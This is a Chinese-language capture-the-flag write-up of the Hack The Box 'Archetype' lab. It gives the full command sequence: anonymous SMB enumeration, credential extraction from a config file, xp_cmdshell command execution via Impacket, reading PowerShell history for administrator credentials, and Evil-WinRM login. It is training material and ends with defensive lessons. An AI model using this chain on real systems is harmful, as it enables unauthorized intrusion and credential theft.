amaljithas23-dot/htb-archetype-writeup

GitHub: amaljithas23-dot/htb-archetype-writeup

一份 Hack The Box Archetype 靶机的完整渗透测试报告,覆盖从 SMB 枚举到 MSSQL 利用再到 Windows 提权的全攻击链。

Stars: 0 | Forks: 0

# Hack The Box – Archetype Write-up(渗透报告) ## 概述 * **平台:** Hack The Box * **靶机:** Archetype * **类别:** Starting Point * **操作系统:** Windows Server 2019 * **难度:** 非常简单 ## 目标 该靶机的目标是执行侦察、枚举网络服务、发现暴露的凭据、通过 Microsoft SQL Server 获取远程命令执行权限,并提升特权以获取 Administrator 访问权限。 # 信息枚举 ## Nmap 扫描 ``` nmap -Pn -sC -sV ``` ### 开放端口 | 端口 | 服务 | | ---- | ------------------- | | 135 | MSRPC | | 139 | NetBIOS | | 445 | SMB | | 1433 | Microsoft SQL Server| | 5985 | WinRM | 扫描发现目标机器上运行着 SMB、Microsoft SQL Server 和 WinRM 服务。 # SMB 枚举 列出可用的 SMB 共享: ``` smbclient -L // -N ``` 发现了以下非管理共享: ``` backups ``` 连接到该共享: ``` smbclient ///backups -N ``` 列出文件: ``` ls ``` 下载配置文件: ``` get prod.dtsConfig ``` 退出 SMB: ``` exit ``` # 凭据发现 查看下载的配置文件: ``` cat prod.dtsConfig ``` 该配置文件中包含了明文的 SQL Server 凭据。 # Microsoft SQL Server 访问 使用 Impacket 进行连接: ``` impacket-mssqlclient ARCHETYPE/sql_svc:@ -windows-auth ``` 身份验证成功后,启用命令执行: ``` enable_xp_cmdshell ``` 验证访问权限: ``` xp_cmdshell whoami ``` 输出: ``` archetype\sql_svc ``` # User Flag(用户标志) 读取 user flag: ``` xp_cmdshell "type C:\Users\sql_svc\Desktop\user.txt" ``` 成功获取 user flag。 # 提权 检查 PowerShell 历史记录文件: ``` xp_cmdshell "type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt" ``` 历史记录文件泄露了 Administrator 的凭据。 # Administrator 访问 使用 Evil-WinRM 进行连接: ``` evil-winrm -i -u administrator -p '' ``` 验证 Administrator 访问权限: ``` whoami ``` 输出: ``` archetype\administrator ``` # Root Flag(根标志) 获取 Administrator flag: ``` type C:\Users\Administrator\Desktop\root.txt ``` 成功捕获 root flag。 # 使用的工具 * Nmap * smbclient * Impacket (`impacket-mssqlclient`) * Microsoft SQL Server (`xp_cmdshell`) * Evil-WinRM # 学到的技能 * 使用 Nmap 进行网络侦察 * SMB 共享枚举 * 匿名 SMB 访问 * 从配置文件中发现凭据 * 使用 Impacket 进行 MSSQL 身份验证 * 使用 `xp_cmdshell` 进行远程命令执行 * Windows 提权 * WinRM 远程管理 * Windows 后渗透方法论 # 攻击路径 ``` Reconnaissance │ ▼ Nmap Scan │ ▼ SMB Enumeration │ ▼ Anonymous Access to backups Share │ ▼ Download prod.dtsConfig │ ▼ Extract SQL Credentials │ ▼ Authenticate to MSSQL │ ▼ Enable xp_cmdshell │ ▼ Command Execution as sql_svc │ ▼ Read PowerShell History │ ▼ Recover Administrator Credentials │ ▼ WinRM Login │ ▼ Administrator Access │ ▼ Retrieve Root Flag ``` # 关键要点 * 切勿在明文配置文件中存储凭据。 * 限制对 SMB 共享的匿名访问。 * 禁用不必要的 SQL Server 功能,例如 `xp_cmdshell`。 * 避免在 PowerShell 历史记录中存储敏感凭据。 * 遵循服务账号的最低权限原则。 * 保护 WinRM 等远程管理服务。 ## 免责声明 本报告仅供教育目的。所演示的技术均在受控的 Hack The Box 实验室环境中执行。未经适当授权,请勿在系统上尝试这些技术。
标签:CTI, StruQ, 安全攻防, 提权, 插件系统, 网络安全, 隐私保护, 靶机 write-up